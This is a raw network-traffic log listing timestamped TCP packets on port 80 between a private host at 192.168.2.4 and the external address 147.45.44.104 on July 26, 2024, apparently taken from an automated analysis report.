Jul 26, 2024 18:56:40.943366051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943368912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943380117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943389893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943399906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943411112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.943412066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943434000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.943454981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.944271088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944287062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944295883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944303989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944308996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944314957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944314957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.944315910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944320917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944322109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944325924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944328070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.944338083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.944356918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.944369078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.945051908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.945065022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.945074081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.945085049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.945094109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.945106030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.945127964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.053963900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.053980112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.053991079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054002047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054065943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054090023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054096937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054105997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054106951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054120064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054133892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054192066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054224014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054235935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054261923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054440975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054482937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054634094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054646969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054656982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054670095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054680109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054681063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054706097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054723024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054784060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054795027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054805040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054816008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054828882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054857969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054878950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054891109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054902077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054913044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054918051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054924965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054935932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054935932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054949999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054960966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.054964066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.054992914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.055895090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055906057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055916071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055932999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055943012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055944920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.055954933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055965900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055967093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.055978060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.055989027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.055989981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056001902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056008101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056013107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056025028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056027889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056056976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056833029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056845903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056857109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056869030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056879997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056888103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056891918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056904078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056905985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056915998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056926966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056926966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056937933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056946993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056951046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056962013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.056966066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.056994915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.057807922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057818890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057827950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057838917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057849884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057859898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057861090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.057872057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057883024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057892084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.057894945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057907104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057918072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057924032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.057929039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057940006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.057943106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.057975054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.058770895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058782101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058792114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058803082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058813095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058815956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.058840990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.058933973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058945894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058955908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058969021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058975935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.058981895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.058991909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.058994055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059005976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059017897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059019089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.059047937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.059825897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059834003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059839010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059845924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059850931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059851885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059858084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059863091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059868097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059869051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059874058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059875965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.059878111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.059901953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.059921980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.060802937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060815096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060825109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060834885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060846090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060857058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060861111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.060868979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060879946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060880899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.060892105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060903072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.060903072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060916901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060924053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.060928106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.060941935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.060971022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.061460018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.061511993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.061588049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.061599970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.061610937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.061621904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.061630964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.061630964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.061683893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112067938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112095118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112104893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112190962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112235069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112246990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112257004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112271070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112279892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112298965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112337112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112510920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112555027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112592936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112606049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112623930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112632036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112634897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112647057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112658024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112662077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.112684011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.112709045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113073111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113085032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113123894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113195896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113207102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113218069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113235950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113251925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113401890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113444090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113476038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113542080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113554001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113564968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113576889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113576889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113590956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113605976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113610983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113614082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113615990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113620996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113634109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113637924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113645077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.113655090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113670111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.113692045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114464045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114475965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114487886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114499092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114504099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114511013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114512920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114526033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114545107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114548922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114562035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114564896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114579916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114587069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114598036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114602089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114605904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114608049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.114623070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.114650011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115554094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115566015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115576982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115588903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115598917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115600109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115613937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115623951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115624905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115637064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115642071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115648031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115658998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115659952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115669966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115680933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115689039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115693092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115706921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.115720034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.115741968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116535902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116549015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116564989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116575003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116585970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116588116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116597891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116602898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116611004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116620064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116622925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116635084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116647005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116647959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116657972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116671085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116677046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116683006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116694927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.116694927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116714001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.116740942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.117361069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117371082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117405891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.117419004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.117419004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117433071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117444992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117454052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.117455006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117466927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117475986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.117480040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.117506027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.117521048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.145576954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145627022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.145646095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145658016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145682096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.145699978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.145891905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145904064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145915031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145925999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.145929098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.145950079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.145968914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.146228075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146234035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146236897 CEST	80	49757	147.45.44.104	192.168.2.4
